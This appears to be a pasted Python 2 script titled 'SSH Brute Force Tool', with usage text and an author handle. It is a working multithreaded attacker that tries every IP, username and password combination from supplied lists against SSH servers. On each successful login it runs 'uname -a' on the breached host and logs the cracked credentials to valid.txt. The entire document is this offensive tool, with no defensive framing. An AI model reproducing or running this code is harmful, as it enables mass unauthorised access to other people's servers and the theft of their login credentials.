SHOW:
|
|
- or go back to the newest paste.
1 | import paramiko, sys, Queue, threading | |
2 | ||
3 | class SSHBrute(threading.Thread): | |
4 | def __init__(self, queue): | |
5 | threading.Thread.__init__(self) | |
6 | self.queue = queue | |
7 | def run(self): | |
8 | while True: | |
9 | ip,user,passwd = self.queue.get() | |
10 | self.kraken(ip,user,passwd) | |
11 | self.queue.task_done() | |
12 | ||
13 | def kraken(self,ip,user,passwd): | |
14 | try: | |
15 | if ip in cracked: return False | |
16 | ||
17 | if '%user%' in str(passwd): | |
18 | passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93; | |
19 | if '%User%' in str(passwd): | |
20 | pwd = user + passwd.split("%")***91;2***93; | |
21 | passwd = passwd.split("%")***91;0***93;+pwd.title() | |
22 | if str(passwd) == '%null%': | |
23 | passwd = '' | |
24 | ||
25 | ssh = paramiko.SSHClient() | |
26 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
27 | ssh.connect(ip, username=user, password=passwd, timeout=35) | |
28 | raw.write(ip+' '+user+' '+passwd+'\n') | |
29 | raw.flush() | |
30 | chan = ssh.get_transport().open_session() | |
31 | chan.settimeout(35) | |
32 | chan.exec_command('uname -a') | |
33 | data = chan.recv(1024) | |
34 | ||
35 | if len(data) == 0: | |
36 | nologs.write(ip+' '+user+' '+passwd+'\n') | |
37 | nologs.flush() | |
38 | return False | |
39 | ||
40 | val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') | |
41 | val.flush() | |
42 | cracked.append(ip) | |
43 | chan.close() | |
44 | ssh.close() | |
45 | return True | |
46 | except Exception, e: | |
47 | if 'uthent' in str(e): | |
48 | if dbg == 'bad': | |
49 | bad.write(ip+'\n') | |
50 | bad.flush() | |
51 | #print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+' ' | |
52 | ssh.close() | |
53 | return False | |
54 | #print ip, str(e) | |
55 | ssh.close() | |
56 | return False | |
57 | ||
58 | def brutemain(): | |
59 | if len(sys.argv) < 2: | |
60 | print """ | |
61 | SSH Brute Force Tool | |
62 | Author: @Elohim ***91;RST***93; | |
63 | Usage: | |
64 | bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* | |
65 | *The filter Switch Takes Either the word "bad" or "no". | |
66 | If you supply the word bad, it filters in bad.txt only the ips | |
67 | which indeed support ssh AUTH and password didn't work""" | |
68 | return False | |
69 | ThreadNR = int(sys.argv***91;1***93;) | |
70 | queue = Queue.Queue(maxsize=20000) | |
71 | try: | |
72 | i = 0 | |
73 | for i in range(ThreadNR): | |
74 | t = SSHBrute(queue) | |
75 | t.daemon = True | |
76 | t.start() | |
77 | i += 1 | |
78 | except Exception, e: | |
79 | print 'Cant start more than',i,'Threads!' | |
80 | ||
81 | global bad | |
82 | global val | |
83 | global nologs | |
84 | global cracked | |
85 | global raw | |
86 | cracked = ***91;***93; | |
87 | bad = open('bad.txt','w') | |
88 | val = open('valid.txt','a') | |
89 | nologs = open('nologins.txt','a') | |
90 | raw = open('raw.txt','a') | |
91 | with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines() | |
92 | with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines() | |
93 | with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines() | |
94 | global dbg | |
95 | dbg = str(sys.argv***91;5***93;) | |
96 | ||
97 | try: | |
98 | for password in passwords: | |
99 | for user in users: | |
100 | for ip in ips: | |
101 | queue.put((ip,user,password)) | |
102 | except: | |
103 | pass | |
104 | ||
105 | queue.join() | |
106 | ||
107 | if __name__ == "__main__": | |
108 | brutemain() |